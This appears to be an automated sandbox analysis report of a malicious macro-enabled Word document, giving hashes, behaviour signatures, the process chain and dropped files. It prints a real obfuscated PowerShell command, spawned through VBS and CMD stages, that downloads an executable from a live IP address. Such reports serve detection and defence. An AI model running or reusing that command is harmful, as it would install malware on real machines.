General

Target: cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
Filesize: 89KB
Completed: 21-05-2022 12:29
Task: behavioral2
Score: 10/10

MD5: b52f6306e6c5af7bd87fab6f32a937b9
SHA1: e7043e9907b332b9039eeb4487959d10e05d2dc0
SHA256: cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4
SHA512: 0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb

Malware Config

Extracted
Language: ps1
Deobfuscated
URLs:
  exe.dropper: http://62.108.35.164/api.php

Signatures 13

Discovery
  • Process spawned unexpected child process
    explorer.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 4004 | 3488 | explorer.exe | WINWORD.EXE
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid | process
    48 | 3596 | powershell.exe
  • Checks computer location settings
    WScript.exe

    Description

    Looks up the country code configured in the registry, likely as a geofence check.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | WScript.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks processor information in registry
    WINWORD.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  • Delays execution with timeout.exe
    timeout.exe

    Reported IOCs

    pid | process
    1652 | timeout.exe
  • Enumerates system info in registry
    WINWORD.EXE

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  • Modifies registry class
    explorer.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings | explorer.exe
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pid | process
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pid | process
    3596 | powershell.exe
    3596 | powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 3596 | powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pid | process
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    WINWORD.EXE, explorer.exe, WScript.exe, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 3488 wrote to memory of 4004 | 3488 | WINWORD.EXE | explorer.exe
    PID 3488 wrote to memory of 4004 | 3488 | WINWORD.EXE | explorer.exe
    PID 100 wrote to memory of 3796 | 100 | explorer.exe | WScript.exe
    PID 100 wrote to memory of 3796 | 100 | explorer.exe | WScript.exe
    PID 3796 wrote to memory of 760 | 3796 | WScript.exe | cmd.exe
    PID 3796 wrote to memory of 760 | 3796 | WScript.exe | cmd.exe
    PID 760 wrote to memory of 3596 | 760 | cmd.exe | powershell.exe
    PID 760 wrote to memory of 3596 | 760 | cmd.exe | powershell.exe
    PID 760 wrote to memory of 1652 | 760 | cmd.exe | timeout.exe
    PID 760 wrote to memory of 1652 | 760 | cmd.exe | timeout.exe
Processes 7
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm" /o ""
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      Process spawned unexpected child process
      PID:4004
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:100
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
        Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:3596
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          Delays execution with timeout.exe
          PID:1652
Downloads
  • C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
    MD5: 197fd11428deaf8779c40b8aee37c023
    SHA1: 66d053c6349a994301ba6ec562c7e659f6e60e40
    SHA256: 7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8
    SHA512: ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4
  • C:\ProgramData\OIUTFuy
    MD5: 12a0751c89b3b618b7c91cee7a231878
    SHA1: 2d546c942a6626826dc1d76d752cb6bb67546a94
    SHA256: c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc
    SHA512: aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3
  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    MD5: d940788959fad6d9ec52674997f04457
    SHA1: c784384517d2c206c5423a8d58dee5d9ca9c6ffb
    SHA256: 46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646
    SHA512: 802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430
